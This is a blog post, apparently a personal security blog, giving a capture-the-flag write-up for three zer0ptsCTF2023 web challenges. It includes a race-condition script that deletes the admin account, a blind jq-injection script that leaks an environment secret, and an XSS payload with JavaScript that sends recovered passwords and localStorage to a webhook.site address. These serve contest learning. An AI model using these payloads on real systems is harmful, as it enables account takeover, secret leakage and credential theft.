<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="P3ngu1nW">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    
    
    <!--- Seo Part-->
    
    <link rel="canonical" href="http://example.com/2023/07/18/zer0ptsctf2023-wp/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
        <meta name="description" content="zer0ptsCTF2023 WPWarmuprofileA nice race condition problem. It is easy to find that, our goal is to delete the admin’s account and register a new one. However there is a strict checker before the oper">
<meta property="og:type" content="article">
<meta property="og:title" content="zer0ptsCTF2023 WP">
<meta property="og:url" content="http://example.com/2023/07/18/zer0ptsCTF2023-WP/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="zer0ptsCTF2023 WPWarmuprofileA nice race condition problem. It is easy to find that, our goal is to delete the admin’s account and register a new one. However there is a strict checker before the oper">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2023/07/18/zer0ptsCTF2023-WP/image-20230718130824146.png">
<meta property="og:image" content="http://example.com/2023/07/18/zer0ptsCTF2023-WP/image-20230718141229322.png">
<meta property="og:image" content="http://example.com/2023/07/18/zer0ptsCTF2023-WP/image-20230718144424825.png">
<meta property="og:image" content="http://example.com/2023/07/18/zer0ptsCTF2023-WP/image-20230718171928155.png">
<meta property="og:image" content="http://example.com/2023/07/18/zer0ptsCTF2023-WP/image-20230718172118824.png">
<meta property="article:published_time" content="2023-07-18T04:56:00.000Z">
<meta property="article:modified_time" content="2023-07-18T09:58:30.287Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="WP">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2023/07/18/zer0ptsCTF2023-WP/image-20230718130824146.png">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/redefine-favicon.svg" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/redefine-favicon.svg">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/images/redefine-favicon.svg">
    <!--- Page Info-->
    
    <title>
        
            zer0ptsCTF2023 WP -
        
        P3ngu1nW
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    
<link rel="stylesheet" href="/assets/fonts.css">

    <!--- Font Part-->
    
    
    
    

    <!--- Inject Part-->
    
    <script id="hexo-configurations">
    let Global = window.Global || {};
    Global.hexo_config = {"hostname":"example.com","root":"/","language":"en"};
    Global.theme_config = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":true,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":true,"lazyload":true,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"busuanzi_counter":{"enable":true,"site_pv":true,"site_uv":true,"post_pv":true},"pjax":true,"open_graph":true,"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/wallhaven-wqery6-light.webp","dark":"/images/wallhaven-wqery6-dark.webp"},"title":"P3ngu1nW","subtitle":{"text":["努力会说谎，但努力不会白费。"],"hitokoto":{"enable":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":true,"links":{"github":"https://github.com/p3ngu1nw"}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null}]},"mermaid":{"enable":false,"version":"9.3.0"}},"version":"2.1.3","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"}},"search":{"enable":false,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"links":null},"article_date_format":"auto","categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}}};
    Global.language_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
<div class="progress-bar-container">
    

    
        <span class="pjax-progress-bar"></span>
        <span class="pjax-progress-icon">
            <i class="fa-solid fa-circle-notch fa-spin"></i>
        </span>
    
</div>


<main class="page-container">

    

    <div class="main-content-container">

        <div class="main-content-header">
            <header class="navbar-container">
    
    <div class="navbar-content">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                P3ngu1nW
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class="" 
                                    href="/"  >
                                    
                                        
                                            <i class="fa-regular fa-house"></i>
                                        
                                        HOME
                                    
                                </a>
                                <!-- Submenu -->
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile drawer -->
    <div class="navbar-drawer">
        <ul class="drawer-navbar-list">
            
                
                    <li class="drawer-navbar-item flex-center">
                        <a class="" 
                        href="/"  >
                             
                                
                                    <i class="fa-regular fa-house"></i>
                                
                                HOME
                            
                        </a>
                    </li>
                    <!-- Submenu -->
                    
            

        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="main-content-body">

            

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="post-page-container">
        <div class="article-content-container">

            
            
                <div class="article-title">
                    <h1 class="article-title-regular">zer0ptsCTF2023 WP</h1>
                </div>
            
                
            

            
                <div class="article-header">
                    <div class="avatar">
                        <img src="/images/profile.jpg">
                    </div>
                    <div class="info">
                        <div class="author">
                            <span class="name">P3ngu1nW</span>
                            
                                <span class="author-label">Lv1</span>
                            
                        </div>
                        <div class="meta-info">
                            <div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2023-07-18 12:56</span>
        <span class="mobile">2023-07-18 12:56</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2023-07-18 17:58:30</span>
            <span class="mobile">2023-07-18 17:58</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/WP/">WP</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
        <span class="article-pv article-meta-item">
            <i class="fa-regular fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                        </div>
                    </div>
                </div>
            

            <div class="article-content markdown-body">
                <h1 id="zer0ptsCTF2023-WP"><a href="#zer0ptsCTF2023-WP" class="headerlink" title="zer0ptsCTF2023 WP"></a>zer0ptsCTF2023 WP</h1><h2 id="Warmuprofile"><a href="#Warmuprofile" class="headerlink" title="Warmuprofile"></a>Warmuprofile</h2><p>A nice race condition problem.</p>
<p>It is easy to find that, our goal is to delete the admin’s account and register a new one. However there is a strict checker before the operation.</p>
<p>Considering the race condition, in one thread, the user has been destroyed, in another thread, we are executing the <code>User.destroy</code></p>
<p>Once the user becomes null, we can delete all the users.</p>
<img lazyload src="/images/loading.svg" data-src="/2023/07/18/zer0ptsCTF2023-WP/image-20230718130824146.png" class title="image-20230718130824146">

<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> threading</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://CBUFJGPbdXQqWiRT:gLUdWZHQOeipJkra@misc2.2023.zer0pts.com:64794/&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">run</span>(<span class="params">sess</span>):</span><br><span class="line">    sess.post(url + <span class="string">&quot;user/a/delete&quot;</span>)</span><br><span class="line"></span><br><span class="line">sess = requests.session()</span><br><span class="line">sess.post(url + <span class="string">&quot;register&quot;</span>, data=&#123;<span class="string">&quot;username&quot;</span>: <span class="string">&#x27;a&#x27;</span>, <span class="string">&quot;password&quot;</span>: <span class="string">&#x27;a&#x27;</span>, <span class="string">&quot;profile&quot;</span>: <span class="string">&#x27;a&#x27;</span>&#125;)</span><br><span class="line">sess.post(url + <span class="string">&quot;login&quot;</span>, data=&#123;<span class="string">&quot;username&quot;</span>: <span class="string">&#x27;a&#x27;</span>, <span class="string">&quot;password&quot;</span>: <span class="string">&#x27;a&#x27;</span>&#125;)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">30</span>):</span><br><span class="line">    threading.Thread(target=run, args=(sess,)).start()</span><br><span class="line">res = requests.post(url + <span class="string">&quot;register&quot;</span>, data=&#123;<span class="string">&quot;username&quot;</span>: <span class="string">&#x27;admin&#x27;</span>, <span class="string">&quot;password&quot;</span>: <span class="string">&#x27;admin&#x27;</span>, <span class="string">&quot;profile&quot;</span>: <span class="string">&#x27;a&#x27;</span>&#125;)</span><br><span class="line"><span class="built_in">print</span>(res.text)</span><br></pre></td></tr></table></figure></div>

<p>In the official WP, we just need to login in two different sessions, and execute the delete operation.</p>
<h2 id="jqi"><a href="#jqi" class="headerlink" title="jqi"></a>jqi</h2><p><a class="link" target="_blank" rel="noopener" href="https://jqlang.github.io/jq/manual/">what is jq? <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>
<blockquote>
<p>A jq program is a “filter”: it takes an input, and produces an output. There are a lot of builtin filters for extracting a particular field of an object, or converting a number to a string, or various other standard tasks.</p>
</blockquote>
<p>In this problem, we are going to bypass the checker and inject into the jq command.</p>
<img lazyload src="/images/loading.svg" data-src="/2023/07/18/zer0ptsCTF2023-WP/image-20230718141229322.png" class title="image-20230718141229322">

<p>We can find that the checker has banned <code>&quot;</code> and<code>\(</code></p>
<p>In order to inject our command, we can use <code>\</code> to escape double quotes, and we can submit two condition to close double quotes, and in command <code>env</code> , we can fetch the FLAG from system env variables.</p>
<img lazyload src="/images/loading.svg" data-src="/2023/07/18/zer0ptsCTF2023-WP/image-20230718144424825.png" class title="image-20230718144424825">

<p>However, it will not return the FLAG directly, we need to use blind injection.</p>
<p>We can use <code>explode</code> filter to transform the String into a number array, and use<code>| if .[0:1]&gt;=10 then halt_error(1) else halt end</code> to check whether we got the correct character.</p>
<p>Besides, we can use binary search to accelerate this process.</p>
<div class="highlight-container" data-rel="Python"><figure class="iseeu highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://127.0.0.1:8300/api/search?keys=name%2Ctags%2Cauthor%2Cflag&amp;conds=&quot;</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">&quot;%5C%20in%20name%2C%29%29%5D%20%7C%20env%20%7C%20.FLAG%20%7C%20explode%20%7C%20if%20.[&#123;id&#125;]&gt;=&#123;num&#125;%20then%20halt_error%281%29%20else%20halt%20end%20%23%20in%20name&quot;</span></span><br><span class="line"></span><br><span class="line">flag = <span class="string">&quot;&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">20</span>):</span><br><span class="line">    l, r = <span class="number">0</span>, <span class="number">127</span></span><br><span class="line">    <span class="keyword">while</span> l &lt; r - <span class="number">1</span>:</span><br><span class="line">        mid = (l + r) // <span class="number">2</span></span><br><span class="line">        res = requests.get(url + payload.<span class="built_in">format</span>(<span class="built_in">id</span>=i, num=mid))</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&quot;wrong&quot;</span> <span class="keyword">in</span> res.text:</span><br><span class="line">            l = mid</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            r = mid</span><br><span class="line">    flag = flag + <span class="built_in">chr</span>(l)</span><br><span class="line">    <span class="built_in">print</span>(flag)</span><br></pre></td></tr></table></figure></div>

<h2 id="Neko-note"><a href="#Neko-note" class="headerlink" title="Neko-note"></a>Neko-note</h2><p>We can see in function <code>replaceLinks</code>, there exists a variable splicing.</p>
<img lazyload src="/images/loading.svg" data-src="/2023/07/18/zer0ptsCTF2023-WP/image-20230718171928155.png" class title="image-20230718171928155">

<p>Note that the server doesn’t check the note’s title, so we can make a XSS here.</p>
<img lazyload src="/images/loading.svg" data-src="/2023/07/18/zer0ptsCTF2023-WP/image-20230718172118824.png" class title="image-20230718172118824">

<p>In onfocus, we can use <code>1 onfocus=document.body.appendChild(document.createElement(&quot;script&quot;)).src=&quot;VPS/evil.js&quot; autofocus</code> to load any js we want</p>
<p>In our evil JS, we can use <code>document.execCommand(&#39;undo&#39;);</code> to recover the password and use <code>document.location</code> to transfer the information</p>
<div class="highlight-container" data-rel="Javascript"><figure class="iseeu highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable language_">document</span>.<span class="title function_">execCommand</span>(<span class="string">&#x27;undo&#x27;</span>);</span><br><span class="line"><span class="variable language_">document</span>.<span class="property">location</span>=<span class="string">&#x27;https://webhook.site/968d6497-f519-45b9-be90-ffaa22eedc24/&#x27;</span>+<span class="built_in">escape</span>(<span class="title class_">JSON</span>.<span class="title function_">stringify</span>(<span class="variable language_">localStorage</span>.<span class="title function_">getItem</span>(<span class="string">&#x27;neko-note-history&#x27;</span>)))+<span class="built_in">escape</span>(<span class="variable language_">document</span>.<span class="property">body</span>.<span class="title function_">querySelector</span>(<span class="string">&#x27;input&#x27;</span>).<span class="property">value</span>);</span><br></pre></td></tr></table></figure></div>

<p><a class="link" target="_blank" rel="noopener" href="https://gist.github.com/lebr0nli/4a6a53e6825d83cfe74aa8eb370895f0">Official WP <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>

            </div>

            
                <div class="post-copyright-info">
                    <div class="article-copyright-info-container">
    <ul>
        <li><strong>Title:</strong> zer0ptsCTF2023 WP</li>
        <li><strong>Author:</strong> P3ngu1nW</li>
        <li><strong>Created at:</strong> 2023-07-18 12:56:00</li>
        
            <li>
                <strong>Updated at:</strong> 2023-07-18 17:58:30
            </li>
        
        <li>
            <strong>Link:</strong> https://p3ngu1nw.github.io/2023/07/18/zer0ptsCTF2023-WP/
        </li>
        <li>
            <strong>License:</strong> This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">CC BY-NC-SA 4.0</a>.
        </li>
    </ul>
</div>

                </div>
            

            
                <ul class="post-tags-box">
                    
                        <li class="tag-item">
                            <a href="/tags/WP/">#WP</a>&nbsp;
                        </li>
                    
                </ul>
            

            

            
                <div class="article-nav">
                    
                    
                        <div class="article-next">
                            <a class="next"
                            rel="next"
                            href="/2023/07/13/Tomcat-Architecture/"
                            >
                                <span class="title flex-center">
                                    <span class="post-nav-title-item">Tomcat Architecture</span>
                                    <span class="post-nav-item">Next posts</span>
                                </span>
                                <span class="right arrow-icon flex-center">
                                    <i class="fa-solid fa-chevron-right"></i>
                                </span>
                            </a>
                        </div>
                    
                </div>
            


            
                <div class="comment-container">
                    <div class="comments-container">
    <div id="comment-anchor"></div>
    <div class="comment-area-title">
        <i class="fa-solid fa-comments"></i>&nbsp;Comments
    </div>
    

        
            
 
    <div id="waline"></div>
    <script type="module"  data-pjax>
        import { init } from 'https://evan.beee.top/js/waline.mjs';

        function loadWaline() {
            init({
                el: '#waline',
                serverURL: 'https://example.example.com',
                lang: 'en-US',
                dark: 'body[class~="dark-mode"]',
                requiredMeta: ['nick','mail'], // cannot customize by theme config, change it yourself
            });
        }

        if ('true') {
            const loadWalineTimeout = setTimeout(() => {
                loadWaline();
                clearTimeout(loadWalineTimeout);
            }, 1000);
        } else {
            window.addEventListener('DOMContentLoaded', loadWaline);
        }
        
    </script>



        
    
</div>

                </div>
            
        </div>

        
            <div class="toc-content-container">
                <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">On this page</div>
        <div class="page-title">zer0ptsCTF2023 WP</div>
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#zer0ptsCTF2023-WP"><span class="nav-text">zer0ptsCTF2023 WP</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Warmuprofile"><span class="nav-text">Warmuprofile</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#jqi"><span class="nav-text">jqi</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Neko-note"><span class="nav-text">Neko-note</span></a></li></ol></li></ol>

    </div>
</div>
            </div>
        
    </div>
</div>


                

            </div>
            
            

        </div>

        <div class="main-content-footer">
            <footer class="footer">
    <div class="info-container">
        <div class="copyright-info">
            &copy;
            
              <span>2022</span>
              -
            
            2023&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">P3ngu1nW</a>
        </div>
        
            <script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="website-count info-item">
                
                    <span id="busuanzi_container_site_uv" class="busuanzi_container_site_uv">
                        VISITOR COUNT&nbsp;<span id="busuanzi_value_site_uv" class="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="busuanzi_container_site_pv">
                        TOTAL PAGE VIEWS&nbsp;<span id="busuanzi_value_site_pv" class="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="theme-info info-item">
            <span class="powered-by-container">POWERED BY <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" href="https://hexo.io">Hexo</a></span>
                <br>
            <span class="theme-version-container">THEME&nbsp;<a class="theme-version" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.1.3</a>
        </div>
        
        
        
            <div id="start_div" style="display:none">
                2022/8/17 11:45:14
            </div>
            <div>
                Blog up for <span class="odometer" id="runtime_days" ></span> days <span class="odometer" id="runtime_hours"></span> hrs <span class="odometer" id="runtime_minutes"></span> Min <span class="odometer" id="runtime_seconds"></span> Sec
            </div>
        
        
        
            <script async data-pjax>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
            <li class="go-comment">
                <i class="fa-regular fa-comments"></i>
            </li>
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-expand-width flex-center">
            <i class="fa-regular fa-expand"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    


</main>




<script src="/js/utils.js"></script>

<script src="/js/main.js"></script>

<script src="/js/layouts/navbarShrink.js"></script>

<script src="/js/tools/scrollTopBottom.js"></script>

<script src="/js/tools/lightDarkSwitch.js"></script>





    
<script src="/js/tools/codeBlock.js"></script>




    
<script src="/js/layouts/lazyload.js"></script>




    
<script src="/js/tools/runtime.js"></script>

    
<script src="/js/layouts/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">




  
<script src="/js/libs/Typed.min.js"></script>

  
<script src="/js/plugins/typed.js"></script>








<div class="post-scripts pjax">
    
        
<script src="/js/tools/tocToggle.js"></script>

<script src="/js/libs/anime.min.js"></script>

<script src="/js/layouts/toc.js"></script>

<script src="/js/plugins/tabs.js"></script>

    
</div>


    
<script src="/js/libs/pjax.min.js"></script>

<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax',
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
            // scrollTo: true,
        });

        document.addEventListener('pjax:send', () => {
            Global.utils.pjaxProgressBarStart();
        });

        document.addEventListener('pjax:complete', () => {
            Global.utils.pjaxProgressBarEnd();
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
            Global.refresh();
        });
    });
</script>




</body>
</html>
